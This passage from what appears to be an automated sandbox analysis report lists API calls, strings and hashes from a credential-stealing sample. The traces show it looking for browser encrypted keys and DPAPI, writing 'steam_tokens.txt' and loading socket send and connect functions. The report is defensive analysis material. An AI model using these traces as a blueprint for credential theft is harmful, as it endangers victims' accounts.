                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID: JZ$a&[
                              • API String ID: 2001356338-2897072212
                              • Opcode ID: 72d6c135cfd8559b6e00290fec5aea903a20865eeebdb51677c77a355ac19aaa
                              • Instruction ID: 6f1fa26240a110084c0cad860a9002c530360fa74e55de18683ba0af3655963c
                              • Opcode Fuzzy Hash: 72d6c135cfd8559b6e00290fec5aea903a20865eeebdb51677c77a355ac19aaa
                              • Instruction Fuzzy Hash: CE81C370E0020A9BDF14DF95DC49BEEBBB5BF84310F18816DE508A7281EB75AD41CBA5
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 0059717E
                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 005971B9
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005971C0
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00597203
                              • HeapFree.KERNEL32(00000000), ref: 0059720A
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00597269
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                              • String ID:
                              • API String ID: 174687898-0
                              • Opcode ID: afcf870080634d1d88006b5f70e4aa2cbd6f72a1e58a937d66e0e2a446da2b77
                              • Instruction ID: ef7521b13255f0960e8eaef1d837f03a18001b89f2f865693a571319e8baf060
                              • Opcode Fuzzy Hash: afcf870080634d1d88006b5f70e4aa2cbd6f72a1e58a937d66e0e2a446da2b77
                              • Instruction Fuzzy Hash: C9416B7571570A9BEF20CFA9D884BAAB7E8FB88305F1445AAE849C7300E735E8408B50
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 00599D08
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00599D3A
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00599D63
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocLocallstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2746078483-738592651
                              • Opcode ID: 9099a28b81442c52ec5478c7939a7e19392e3e25e190e14ec0ca8dd784cb4a8f
                              • Instruction ID: 4982ff92c8b677c730ba088f14b01a14ea566bd7a4130d42991495fc8b6a5a7d
                              • Opcode Fuzzy Hash: 9099a28b81442c52ec5478c7939a7e19392e3e25e190e14ec0ca8dd784cb4a8f
                              • Instruction Fuzzy Hash: 2F418271A0130AABDF10EFA8CC89AAE7FB4FF84700F44456DE958A7252DA30ED45C791
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005AEB8B
                              • lstrcpy.KERNEL32(00000000,?), ref: 005AEBC0
                              • lstrcat.KERNEL32(?,00000000), ref: 005AEBCC
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 005AEBE3
                              • lstrcat.KERNEL32(?,016096C8), ref: 005AEBF4
                              • lstrcat.KERNEL32(?,005C1D5C), ref: 005AEC04
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                               • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 60db6cae15ceb8a7efe9387228feb81daba717c4bc8deeb42f1c7249c9aaeec0
                              • Instruction ID: 635407387bfc8f2db836b03b0b9a493fac1b8297bc843d55cb355cee3bac4aa8
                              • Opcode Fuzzy Hash: 60db6cae15ceb8a7efe9387228feb81daba717c4bc8deeb42f1c7249c9aaeec0
                              • Instruction Fuzzy Hash: C141BB71514205AFC750EF64DC4AEDE7BA4FFC8700F40C82DBA5987291DE34D9458B96
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005AEE3F
                              • lstrlen.KERNEL32(00000000), ref: 005AEE4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005AEE74
                              • lstrlen.KERNEL32(00000000), ref: 005AEE7B
                              • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 005AEEAF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: steam_tokens.txt
                              • API String ID: 367037083-401951677
                              • Opcode ID: adcdbc3219cf1abf725433a37352dea905e1a5969c781642f8f1abac61f99217
                              • Instruction ID: 27eb8473eb921ac1c3d919647597a217b0d22630cf5dc8303f8988e9033f39d4
                              • Instruction Fuzzy Hash: 73316D31A1251A6BCB21BF78DC4EA9F7FA8FF81B00F444024B944DB212EA34DD4687D1
                              APIs
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,005912EE), ref: 00599AFA
                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,005912EE), ref: 00599B10
                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,005912EE), ref: 00599B27
                              • ReadFile.KERNEL32(00000000,00000000,?,005912EE,00000000,?,?,?,005912EE), ref: 00599B40
                              • LocalFree.KERNEL32(?,?,?,?,005912EE), ref: 00599B60
                              • CloseHandle.KERNEL32(00000000,?,?,?,005912EE), ref: 00599B67
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: caee8445d23baae34f2d6fab6250ad29ef57070fd72bc7aaf541c2dc73b6bda6
                              • Instruction ID: 4151da2915ce901ee0497f52da5a7fecae21284c25cc8929b9e6bb60a7a06daf
                              • Instruction Fuzzy Hash: 41112E7160421AAFEB10DFA9EC88EBE7B6DFB44710F14415DF91597280EB38AD408B69
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005B5B34
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1B8
                                • Part of subcall function 005BA1A3: std::exception::exception.LIBCMT ref: 005BA1DE
                              • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 005B5B9C
                              • memmove.MSVCRT(00000000,?,?), ref: 005B5BA9
                              • memmove.MSVCRT(00000000,?,?), ref: 005B5BB8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                              • String ID: vector<T> too long
                              • API String ID: 2052693487-3788999226
                              • Opcode ID: 493370702132029ae187c80189cd4eaf606600753dcf242c5d495f6d3243e0ab
                              • Instruction ID: b1d76ac77a3fabc489a40c25534c2c0d633221e788bd8aa359f9c9e5396046a1
                              • Instruction Fuzzy Hash: 57416D75A005159FCF08DFACC995BAEBBB5FB88310F148229E919E7384E670AD00CB90
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 005A7DD8
                                • Part of subcall function 005BA1F0: std::exception::exception.LIBCMT ref: 005BA205
                                • Part of subcall function 005BA1F0: std::exception::exception.LIBCMT ref: 005BA22B
                              • std::_Xinvalid_argument.LIBCPMT ref: 005A7DF6
                              • std::_Xinvalid_argument.LIBCPMT ref: 005A7E11
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$std::exception::exception
                              • String ID: invalid string position$string too long
                              • API String ID: 3310641104-4289949731
                              • Opcode ID: fa52c8778daed962f5954feb280abe640f1f877373474747ac64213678ce9521
                              • Instruction ID: d3d82c340b334e49066cc18b310ba17fb24eeeaa83f8b573f39c4e3a0723b4b9
                              • Instruction Fuzzy Hash: 8B2193323046058BD720DE7CDC80A2EFBE9FF9A710F204A6EE456CB241E771AC4083A1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005B338F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B3396
                              • GlobalMemoryStatusEx.KERNEL32 ref: 005B33B1
                              • wsprintfA.USER32 ref: 005B33D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB
                              • API String ID: 2922868504-2651807785
                              • Opcode ID: c8d6934966f4137e5ed021acfc59aa9f041f21384f8f5bcc15bea8be54e83baa
                              • Instruction ID: 8727025dbe3401f825d55bf027d2745832f5373756ccd141e09969e1cad73e84
                              • Instruction Fuzzy Hash: 2C01B971A04214AFD7049F98CD49FAEBBB8FB44710F10452DF906E7390D77859008695
                              APIs
                                • Part of subcall function 005B4800: LoadLibraryA.KERNEL32(ws2_32.dll,?,005A7741), ref: 005B4806
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,connect), ref: 005B481C
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 005B482D
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 005B483E
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,htons), ref: 005B484F
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 005B4860
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,recv), ref: 005B4871
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,socket), ref: 005B4882
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 005B4893
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,closesocket), ref: 005B48A4
                                • Part of subcall function 005B4800: GetProcAddress.KERNEL32(00000000,send), ref: 005B48B5
                              • StrCmpCA.SHLWAPI(?,01609708), ref: 005A7770
                              • StrCmpCA.SHLWAPI(?,01609798), ref: 005A7848
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A7880
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A78DD
                                • Part of subcall function 005B7240: lstrcpy.KERNEL32(00000000), ref: 005B725A
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591437
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591459
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,005BD014), ref: 005A5C15
                                • Part of subcall function 005A5BE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 005A5C44
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C75
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C9D
                                • Part of subcall function 005A5BE0: lstrcat.KERNEL32(00000000,00000000), ref: 005A5CA8
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5CD0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$AddressProc$FolderLibraryLoadPathlstrcat
                              • String ID:
                              • API String ID: 38527155-0
                              • Opcode ID: fe08859172fae5d1e54630acfd3753f53f6262cba720949f34720ec2df6794fb
                              • Instruction ID: a678abc856079a0daf9a797e372f4e670e32387576f6942a7b4ab60ce997ab17
                              • Instruction Fuzzy Hash: 0FF19075A0420A8FCB24DF29C849B9DBBB5BF89314F19C1ADD8089B352D735ED42CB91
                              APIs
                              • StrCmpCA.SHLWAPI(?,01609708), ref: 005A7770
                              • StrCmpCA.SHLWAPI(?,01609798), ref: 005A7848
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A7880
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A78DD
                                • Part of subcall function 005B7240: lstrcpy.KERNEL32(00000000), ref: 005B725A
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591437
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 00591459
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 0059147B
                                • Part of subcall function 00591410: lstrcpy.KERNEL32(00000000,?), ref: 005914DF
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,005BD014), ref: 005A5C15
                                • Part of subcall function 005A5BE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 005A5C44
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C75
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5C9D
                                • Part of subcall function 005A5BE0: lstrcat.KERNEL32(00000000,00000000), ref: 005A5CA8
                                • Part of subcall function 005A5BE0: lstrcpy.KERNEL32(00000000,00000000), ref: 005A5CD0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FolderPathlstrcat
                              • String ID:
                              • API String ID: 2938889746-0
                              • Opcode ID: 225fec686754a9acb318094c21a96fadb149b990a84bdbb1c2fdb26c861e9426
                              • Instruction ID: 7e75109ddd8aded9efa8b3bb1e935bbbdbb57e09253888e20e52047de5b4c980
                              • Instruction Fuzzy Hash: A0F17175A052098FCB64DF29C848A9DBBF1BF89314F19C1ADD8089B362D735ED42CB91
                              APIs
                              • StrCmpCA.SHLWAPI(?,01609708), ref: 005A7770
                              • StrCmpCA.SHLWAPI(?,01609798), ref: 005A7848
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A7880
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A78DD
                              • StrCmpCA.SHLWAPI(?,01609678), ref: 005A7B7D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 62a8ba956af398c331cf9e411030ce7c85c0fb2c15da07b0d48d47830f75079b
                              • Instruction ID: c03b2a34f8dd060a326337fca528b739e2ca073e0017a14434d602a55b010408
                              • Opcode Fuzzy Hash: 62a8ba956af398c331cf9e411030ce7c85c0fb2c15da07b0d48d47830f75079b
                              • Instruction Fuzzy Hash: 19F17175A052098FCB64DF29C848A9DBBF1BF89314F19C1ADD8089B362D735ED42CB91
                              APIs
                              • StrCmpCA.SHLWAPI(?,01609708), ref: 005A7770
                              • StrCmpCA.SHLWAPI(?,01609678), ref: 005A7B7D
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2ba2608335010477aecd0f34452ed591a8f72330ce55bf875fe0e1bcfee551ab
                              • Instruction ID: fdc5fa721a69d5baec4892e9a6f4e74ee68aa7b0369e6986fc7b1630f4c70cc8
                              • Opcode Fuzzy Hash: 2ba2608335010477aecd0f34452ed591a8f72330ce55bf875fe0e1bcfee551ab
                              • Instruction Fuzzy Hash: C5E17175A042098FCB64DF29C848A5DBBF1BF89314F19C1ADD8089B362D735ED42CB91
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,0160DDA0,00000000,00020119,?,00000000,000000FE), ref: 005AD90C
                              • RegQueryValueExA.ADVAPI32(?,0160E928,00000000,00000000,?,?), ref: 005AD933
                              • RegCloseKey.ADVAPI32(?), ref: 005AD93E
                              • lstrcat.KERNEL32(?,?), ref: 005AD964
                              • lstrcat.KERNEL32(?,0160E760), ref: 005AD976
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValue
                              • String ID:
                              • API String ID: 690832082-0
                              • Opcode ID: a0b165bef21b21ab9ebc6b7da60cd1507220f53c1ff68b0a010ff2ed7f5c0055
                              • Instruction ID: 21a331f785e70ed6ec2eb4989ecf0699533afbb6158029ddc9e6bbde0d007ec4
                              • Opcode Fuzzy Hash: a0b165bef21b21ab9ebc6b7da60cd1507220f53c1ff68b0a010ff2ed7f5c0055
                              • Instruction Fuzzy Hash: 6D415271214246AFDB54FF24D84AF9F7BA4BBC4304F40882DB98D87251DE34E949CB96
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 005A7FB1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A7FE0
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005A8025
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005A8053
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005A8087
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 6325f206e0756f95649eb7e0ab94aa466719a5a4c8fedbb68f2a8726570965aa
                              • Instruction ID: 747ae9c2d1b5d7bcf2b77643b0971fbd204e59a066f9eeb2ebf0640da3f16498
                              • Opcode Fuzzy Hash: 6325f206e0756f95649eb7e0ab94aa466719a5a4c8fedbb68f2a8726570965aa
                              • Instruction Fuzzy Hash: 6441C334A0450ADFCB10DF58D884EAE7BB4FF4A300F114499E9059B250EB71EBA6CF91
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 005A814B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A817A
                              • StrCmpCA.SHLWAPI(00000000,005C5204), ref: 005A8192
                              • lstrlen.KERNEL32(00000000), ref: 005A81D0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A81FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 12019bd4f3934b221122765605f2b1cd6dc0ead9e4c0e5ecfd0b4ccf4cccaade
                              • Instruction ID: bbcb9283b5100b9450ca24462725ebe337c8ff2d2f981a5668406ddbe106de2f
                              • Opcode Fuzzy Hash: 12019bd4f3934b221122765605f2b1cd6dc0ead9e4c0e5ecfd0b4ccf4cccaade
                              • Instruction Fuzzy Hash: A8415975A00206ABCB20DF68D988BBEBFF4FF45700F15851CA85AD7244EB34E941CB90
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 005B1B52
                                • Part of subcall function 005B1800: lstrcpy.KERNEL32(00000000,005BD014), ref: 005B182F
                                • Part of subcall function 005B1800: lstrlen.KERNEL32(015F6ED8), ref: 005B1840
                                • Part of subcall function 005B1800: lstrcpy.KERNEL32(00000000,00000000), ref: 005B1867
                                • Part of subcall function 005B1800: lstrcat.KERNEL32(00000000,00000000), ref: 005B1872
                                • Part of subcall function 005B1800: lstrcpy.KERNEL32(00000000,00000000), ref: 005B18A1
                                • Part of subcall function 005B1800: lstrlen.KERNEL32(005C5568), ref: 005B18B3
                                • Part of subcall function 005B1800: lstrcpy.KERNEL32(00000000,00000000), ref: 005B18D4
                                • Part of subcall function 005B1800: lstrcat.KERNEL32(00000000,005C5568), ref: 005B18E0
                                • Part of subcall function 005B1800: lstrcpy.KERNEL32(00000000,00000000), ref: 005B190F
                              • sscanf.NTDLL ref: 005B1B7A
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 005B1B96
                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 005B1BA6
                              • ExitProcess.KERNEL32 ref: 005B1BC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                              • String ID:
                              • API String ID: 3040284667-0
                              • Opcode ID: f5fd1ca0bb17690102905d42f8f2d5ae062c7c49aa55ee51d0ef303ac51a5ee2
                              • Instruction ID: f7955bdb2d9b7750099ca1316ab7694daf5004c85dbe76910f9507e3e3fdb1df
                              • Opcode Fuzzy Hash: f5fd1ca0bb17690102905d42f8f2d5ae062c7c49aa55ee51d0ef303ac51a5ee2
                              • Instruction Fuzzy Hash: 6421B5B1518301AF8794DF65D88589BBBF8FEC8314F408A1EF599C3224E774E5058B66
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005B3106
                              • RtlAllocateHeap.NTDLL(00000000), ref: 005B310D
                              • RegOpenKeyExA.ADVAPI32(80000002,015FC7E8,00000000,00020119,?), ref: 005B312C
                              • RegQueryValueExA.ADVAPI32(?,0160DE40,00000000,00000000,00000000,000000FF), ref: 005B3147
                              • RegCloseKey.ADVAPI32(?), ref: 005B3151
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: 2ae95ddb99541b6778ae7fbda579a78e7b99a1b7f500cceef068d05bfafd6d6e
                              • Instruction ID: 2aa469562be592bfd2778fe458767b04e4dbcdc51134712193faba2047efc79d
                              • Opcode Fuzzy Hash: 2ae95ddb99541b6778ae7fbda579a78e7b99a1b7f500cceef068d05bfafd6d6e
                              • Instruction Fuzzy Hash: FA114276A40205AFD750CB94DC49FBBBBBCF744711F10456EFA05D3680DB75590087A5
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: String___crt$Type
